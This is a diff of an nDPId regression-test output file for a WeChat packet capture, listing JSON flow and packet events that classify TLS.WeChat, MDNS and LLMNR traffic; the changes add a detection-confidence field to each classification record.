 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1492167777204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167777204,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XvpAAEAGujnAqAFny82Tq+K3Abv08QbJAAAAAKACchB71AAAAgQFtAQCCAoAMlgzAAAAAAEDAwc="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167777220,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rYX2Lh9mWvEIqASN8j8PgAAAgQFoAQCCApF00IlADJX9AEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167777220,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0k9ZAAEAGhWXAqAFny82Tq+K2AbuZa8QiF9i4foAQAOVhlwAAAQEICgAyWDdF00Il"}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1264,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167776953,"flow_last_seen":1492167777221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167777221,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1492167777476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167777476,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74reza+A99PEGyqASN8j\/yAAAAgQFoAQCCApFrtz+ADJYMwEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1492167777476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167777476,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XvtAAEAGukDAqAFny82Tq+K3Abv08QbKs2vgPoAQAOVlIAAAAQEICgAyWHdFrtz+"}
-00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00651{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1268,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1270,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167776953,"flow_last_seen":1492167777494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"ts_msec":1492167777494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1492167639887,"flow_last_seen":1492167667658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":39199,"flow_avg_l4_payload_len":536,"midstream":0,"ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1492167788126,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492167788126,"pkt":"AQBeAAD70CeIF3AECABFoABEPYcAAAER2HrAqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1327,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788126,"flow_last_seen":1492167788126,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167788126,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788128,"flow_last_seen":1492167788128,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167788128,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1492167788128,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492167788128,"pkt":"MzMAAAD70CeIF3AEht1gAAAAADARAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw3CsAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788128,"flow_last_seen":1492167788128,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167788128,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1328,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167788128,"flow_last_seen":1492167788128,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167788128,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1492167789152,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492167789152,"pkt":"AQBeAAD70CeIF3AECABFoABEPhsAAAER1+bAqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1492167789153,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492167789153,"pkt":"MzMAAAD70CeIF3AEht1gAAAAADARAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw3CsAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1348,"source":"wechat.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1492167789154,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492167789154,"pkt":"AQBeAAD70CeIF3AECABFoABEPiIAAAER19\/AqAFk4AAA+xTpFOkAMOibAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1350,"source":"wechat.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1492167789157,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492167789157,"pkt":"MzMAAAD70CeIF3AEht1gAAAAADARAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw3CsAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795087,"flow_last_seen":1492167795087,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167795087,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1492167795087,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1492167795087,"pkt":"AQBeAAD80CeIF3AECABFoAA4QcoAAAER1ELAqAFk4AAA\/NNsFOsAJPA+T9YAAAABAAAAAAAACmxiamFtd3B0eHoAAAEAAQ=="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795087,"flow_last_seen":1492167795087,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167795087,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795087,"flow_last_seen":1492167795087,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167795087,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":54124,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795088,"flow_last_seen":1492167795088,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795088,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1492167795088,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1492167795088,"pkt":"AQBeAAD80CeIF3AECABFoAA2QcsAAAER1EPAqAFk4AAA\/MKoFOsAIsj\/\/HMAAAABAAAAAAAACGNhbnNhcWNxAAABAAE="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795088,"flow_last_seen":1492167795088,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795088,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795088,"flow_last_seen":1492167795088,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795088,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":49832,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795090,"flow_last_seen":1492167795090,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795090,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1492167795090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1492167795090,"pkt":"AQBeAAD80CeIF3AECABFoAA2QcwAAAER1ELAqAFk4AAA\/OA5FOsAIm9WRGIAAAABAAAAAAAACG1jenRtcGtjAAABAAE="}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795090,"flow_last_seen":1492167795090,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795090,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795090,"flow_last_seen":1492167795090,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1492167795090,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.252","src_port":57401,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795091,"flow_last_seen":1492167795091,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167795091,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1492167795091,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":90,"pkt_l4_len":36,"ts_msec":1492167795091,"pkt":"MzMAAQAD0CeIF3AEht1gAAAAACQRAf6AAAAAAAAAkfk983Q2bNb\/AgAAAAAAAAAAAAAAAQADxQgU6wAk8ypP1gAAAAEAAAAAAAAKbGJqYW13cHR4egAAAQAB"}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795091,"flow_last_seen":1492167795091,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167795091,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1365,"source":"wechat.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167795091,"flow_last_seen":1492167795091,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1492167795091,"l3_proto":"ip6","src_ip":"fe80::91f9:3df3:7436:6cd6","dst_ip":"ff02::1:3","src_port":50440,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
